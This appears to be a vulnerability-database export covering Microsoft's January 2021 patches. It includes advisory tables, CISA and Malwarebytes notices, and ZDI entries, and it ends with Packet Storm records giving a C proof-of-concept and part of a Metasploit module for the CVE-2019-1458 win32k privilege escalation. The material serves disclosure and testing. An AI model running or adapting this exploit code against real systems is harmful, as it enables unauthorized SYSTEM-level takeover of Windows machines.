No | 5.5 | Yes \n[CVE-2021-1670](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1670>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1672](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1672>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1689](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1689>) | Windows Multipoint Management Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1682](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1682>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-1697](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1697>) | Windows InstallService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1662](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1662>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1703](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1703>) | Windows Event Logging Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1645](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1645>) | Windows Docker Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-1637](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1637>) | Windows DNS Query Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1638](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1638>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 7.7 | No 
\n[CVE-2021-1683](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1683>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 5 | No \n[CVE-2021-1684](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1684>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 5 | No \n[CVE-2021-1642](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1642>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1685](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1685>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1648](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1648>) | Microsoft splwow64 Elevation of Privilege Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2021-1710](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1710>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1691](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1691>) | Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-1692](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1692>) | Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-1643](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1643>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1644](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1644>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## Windows Apps Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-1669](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1669>) | Windows Remote Desktop Security Feature Bypass Vulnerability | No | No | 8.8 | Yes \n \n## Windows ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1709](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1709>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-1694](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1694>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-1702](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1702>) | Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1674>) | Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability | No | No | 8.8 | No \n[CVE-2021-1695](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1695>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1676](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1676>) | Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1706](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1706>) | Windows LUAFV Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1661](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1661>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1704](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1704>) | Windows Hyper-V Elevation of Privilege Vulnerability | 
No | No | 7.3 | No \n[CVE-2021-1696](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1696>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1708>) | Windows GDI+ Information Disclosure Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-1657](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1657>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1679](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1679>) | Windows CryptoAPI Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-1652](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1652>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1653](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1653>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1654](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1654>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1655](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1655>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1659](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1659>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1688>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1693](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1693>) | Windows CSC Service Elevation of Privilege Vulnerability 
| No | No | 7.8 | No \n[CVE-2021-1699](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1699>) | Windows (modem.sys) Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1656](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1656>) | TPM Device Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1658](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1658>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1660](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1660>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1666](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1666>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1667](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1667>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1673](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1673>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1664](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1664>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1671](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1671>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1700>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No 
\n[CVE-2021-1701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1701>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1678](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1678>) | NTLM Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-1668](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1668>) | Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1665](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1665>) | GDI+ Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1649](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1649>) | Active Template Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Summary Graphs\n\n_Note: Graph data reflects the data presented by Microsoft's CVRF at the time of writing._", "modified": "2021-01-12T23:59:00", "published": "2021-01-12T23:59:00", "id": "RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3", "href": "https://blog.rapid7.com/2021/01/12/patch-tuesday-january-2021/", "type": "rapid7blog", "title": "Patch Tuesday - January 2021", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:06:37", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "Microsoft has released a security advisory to address a remote code execution vulnerability, [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647>), in Microsoft Defender. A remote attacker can exploit this vulnerability to take control of an affected system. This vulnerability has been detected in exploits in the wild.\n\nCISA encourages users and administrators to review the Microsoft Advisory for CVE-2021-1647 and apply the necessary updates. 
\n", "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "CISA:F7C7CFE30EB8A6B7C1DCDEA50F649F74", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/01/14/rce-vulnerability-affecting-microsoft-defender", "type": "cisa", "title": "RCE Vulnerability Affecting Microsoft Defender ", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-01-15T10:26:58", "bulletinFamily": "blog", "cvelist": ["CVE-2021-1647"], "description": "Every second Tuesday of the month it's 'Patch Tuesday'. On Patch Tuesday Microsoft habitually issues a lot of patches for bugs and vulnerabilities in its software.\n\nIt's always important to patch, but the update that was released on January 12 is one to pay attention to. That's because it contains a patch for a vulnerability in Windows Defender that is already being exploited in the wild.\n\n### The vulnerability in Windows Defender\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) list\u2014a dictionary that provides definitions for publicly disclosed cybersecurity vulnerabilities and exposures. 
The goal of CVE is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe vulnerability in Windows Defender was registered as [CVE-2021-1647](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-1647>)\u2014a Remote Code Execution ([RCE](<https://blog.malwarebytes.com/glossary/remote-code-execution-rce-attack/>)) vulnerability\u2014and was found in the Malware Protection Engine component (mpengine.dll). According to Microsoft: \n\n> "While this issue is labeled as an elevation of privilege, it can also be exploited to disclose information. The type of information that could be disclosed if an attacker successfully exploited this vulnerability is uninitialized memory."\n\n### I don\u2019t see an update for this vulnerability\n\nIf you are missing this fix in your list, it's possible that this bug has already been patched by Microsoft on end-user systems, as the company continuously updates Defender outside of the normal monthly patch cycle. But you may want to check whether you are using a patched version.\n\n### What version of Windows Defender am I using?\n\nThe first patched version is 1.1.17700.4. If you want to make sure that you have a patched version of Windows Defender, here is how you can check this on a Windows 10 computer:\n\n * From the Windows Start Menu, search for **Windows Security** and click on the result that has the **App** text and the \u201cwhite on blue\u201d shield.\n * When Windows Security opens, click on the gear box icon with the **Settings** text at the bottom left of the Window.\n * When the Settings screen opens, click on the **About** link.\n * The Windows Security About page will now be open and will show the Antimalware Client Version (Microsoft Defender version), the Engine version (Scanning Engine), the Antivirus version (Virus definitions), and the Antispyware version (Spyware definitions).\n * The **engine version** is the one that matters here. 
It needs to be at 1.1.17700.4 or newer.\nFinding the Windows Defender version\n\n### The rest of the Microsoft updates\n\nThe total package contained over 80 patches. Ten of them were classified as critical, which means that they could possibly be used in the future by cybercriminals to attack unpatched systems. And even the ones that are not rated as critical could put you at risk at some point. It's always important to apply all the patches as soon as you possibly can, especially when it concerns your operating system. So, please do go install these patches as soon as possible.\n\nStay safe, everyone!\n\nThe post [Microsoft issues 83 patches, one for actively exploited vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/microsoft-issues-83-patches-one-for-actively-exploited-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2021-01-13T19:40:58", "published": "2021-01-13T19:40:58", "id": "MALWAREBYTES:C38FDAA2A9E5E349305313C6D17A0D3A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/microsoft-issues-83-patches-one-for-actively-exploited-vulnerability/", "type": "malwarebytes", "title": "Microsoft issues 83 patches, one for actively exploited vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-01-16T03:31:04", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1647"], "description": "\n", "edition": 4, "modified": "2021-01-15T08:00:00", "id": "MS:CVE-2021-1647", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1647", "published": "2021-01-15T08:00:00", "title": "Microsoft Defender Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-16T01:37:12", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1648"], "description": "\n", "edition": 2, "modified": 
"2021-01-12T08:00:00", "id": "MS:CVE-2021-1648", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1648", "published": "2021-01-12T08:00:00", "title": "Microsoft splwow64 Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-21T13:27:50", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1660"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1660", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1660", "published": "2021-01-12T08:00:00", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-22T13:31:40", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1709"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1709", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1709", "published": "2021-01-12T08:00:00", "title": "Windows Win32k Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T11:48:27", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-8514"], "description": "An information disclosure vulnerability exists when the Windows Remote Procedure Call (RPC) runtime improperly initializes objects in memory. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application.\n\nThe update addresses the vulnerability by correcting how the Remote Procedure Call runtime initializes objects in memory.\n", "edition": 2, "modified": "2018-12-11T08:00:00", "id": "MS:CVE-2018-8514", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8514", "published": "2018-12-11T08:00:00", "title": "Windows Remote Procedure Call Information Disclosure Vulnerability", "type": "mscve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-08-07T11:48:18", "bulletinFamily": "microsoft", "cvelist": ["CVE-2019-1458"], "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. 
An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how Win32k handles objects in memory.\n", "edition": 2, "modified": "2019-12-10T08:00:00", "id": "MS:CVE-2019-1458", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458", "published": "2019-12-10T08:00:00", "title": "Win32k Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T11:48:32", "bulletinFamily": "microsoft", "cvelist": ["CVE-2019-1409"], "description": "An information disclosure vulnerability exists when the Windows Remote Procedure Call (RPC) runtime improperly initializes objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application.\n\nThe update addresses the vulnerability by correcting how the Remote Procedure Call runtime initializes objects in memory.\n", "edition": 2, "modified": "2019-11-12T08:00:00", "id": "MS:CVE-2019-1409", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1409", "published": "2019-11-12T08:00:00", "title": "Windows Remote Procedure Call Information Disclosure Vulnerability", "type": "mscve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "zdi": [{"lastseen": "2021-01-14T19:27:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 
The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "ZDI-21-024", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-024/", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-14T19:27:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. 
An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "ZDI-21-020", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-020/", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-14T19:27:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "ZDI-21-022", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-022/", "title": "Microsoft Windows splwow64 Untrusted Pointer Dereference Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-21T19:27:56", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 
The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-21T00:00:00", "published": "2021-01-21T00:00:00", "id": "ZDI-21-078", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-078/", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-03-09T22:44:29", "description": "", "published": "2020-03-06T00:00:00", "type": "packetstorm", "title": "Microsoft Windows WizardOpium Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-03-06T00:00:00", "id": "PACKETSTORM:156651", "href": "https://packetstormsecurity.com/files/156651/Microsoft-Windows-WizardOpium-Local-Privilege-Escalation.html", "sourceData": "`#include <cstdio> \n#include <windows.h> \n \nextern \"C\" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii); \n \nint main() { \nHINSTANCE hInstance = GetModuleHandle(NULL); \n \nWNDCLASSEX wcx; \nZeroMemory(&wcx, sizeof(wcx)); \nwcx.hInstance = hInstance; \nwcx.cbSize = sizeof(wcx); \nwcx.lpszClassName = L\"SploitWnd\"; \nwcx.lpfnWndProc = DefWindowProc; \nwcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0 \n \nprintf(\"[*] Registering window\\n\"); \nATOM wndAtom = RegisterClassEx(&wcx); \nif (wndAtom == INVALID_ATOM) { \nprintf(\"[-] Failed registering SploitWnd window class\\n\"); \nexit(-1); \n} \n \nprintf(\"[*] Creating instance of this window\\n\"); \nHWND sploitWnd = 
CreateWindowEx(0, L\"SploitWnd\", L\"\", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL); \nif (sploitWnd == INVALID_HANDLE_VALUE) { \nprintf(\"[-] Failed to create SploitWnd window\\n\"); \nexit(-1); \n} \n \nprintf(\"[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\\n\"); \nNtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1); \n \nprintf(\"[*] Allocate memory to be used for corruption\\n\"); \nPVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); \nprintf(\"\\tptr: %p\\n\", mem); \nPBYTE byteView = (PBYTE)mem; \nbyteView[0x6c] = 1; // use GetKeyState in xxxPaintSwitchWindow \n \n//pass DrawSwitchWndHilite double dereference \nPVOID* ulongView = (PVOID*)mem; \nulongView[0x20 / sizeof(PVOID)] = mem; \n \nprintf(\"[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\\n\"); \nSetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem); \nprintf(\"[*] GetLastError = %x\\n\", GetLastError()); \n \nprintf(\"[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\\n\"); \nHWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L\"\", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL); \n \nprintf(\"[*] Simulating alt key press\\n\"); \nBYTE keyState[256]; \nGetKeyboardState(keyState); \nkeyState[VK_MENU] |= 0x80; \nSetKeyboardState(keyState); \n \nprintf(\"[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\"); \nNtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1); \n} \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156651/mswindowswizard-escalate.txt"}, {"lastseen": "2020-10-15T19:31:18", "description": "", "published": "2020-10-15T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Uninitialized Variable Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-10-15T00:00:00", "id": 
"PACKETSTORM:159569", "href": "https://packetstormsecurity.com/files/159569/Microsoft-Windows-Uninitialized-Variable-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/post/file' \nrequire 'msf/core/exploit/exe' \nrequire 'msf/core/post/windows/priv' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::FileInfo \ninclude Msf::Post::Windows::ReflectiveDLLInjection \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation', \n'Description' => %q{ \nThis module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability \nwithin win32k which occurs due to an uninitalized variable, which allows user mode attackers \nto write a limited amount of controlled data to an attacker controlled address \nin kernel memory. By utilizing this vulnerability to execute controlled writes \nto kernel memory, an attacker can gain arbitrary code execution \nas the SYSTEM user. \n \nThis module has been tested against Windows 7 x64 SP1. Offsets within the \nexploit code may need to be adjusted to work with other versions of Windows. \nThe exploit can only be triggered once against the target and can cause the \ntarget machine to reboot when the session is terminated. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'piotrflorczyk', # poc \n'unamer', # exploit \n'timwr', # msf module \n], \n'Platform' => 'win', \n'SessionTypes' => ['meterpreter'], \n'Targets' => \n[ \n['Windows 7 x64', { 'Arch' => ARCH_X64 }] \n], \n'Notes' => \n{ \n'Stability' => [ CRASH_OS_RESTARTS ], \n'Reliability' => [ UNRELIABLE_SESSION ] \n}, \n'References' => \n[ \n['CVE', '2019-1458'], \n['URL', 'https://github.com/unamer/CVE-2019-1458'], \n['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'], \n['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'], \n['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html'] \n], \n'DisclosureDate' => '2019-12-10', \n'DefaultTarget' => 0, \n'AKA' => [ 'WizardOpium' ] \n) \n) \nregister_options([ \nOptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe']) \n]) \nend \n \ndef setup_process \nprocess_name = datastore['PROCESS'] \nbegin \nprint_status(\"Launching #{process_name} to host the exploit...\") \nlaunch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true) \nprocess = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nrescue Rex::Post::Meterpreter::RequestError \n# Sandboxes could not allow to create a new process \n# stdapi_sys_process_execute: Operation failed: Access is denied. \nprint_error('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nend \nprocess \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. 
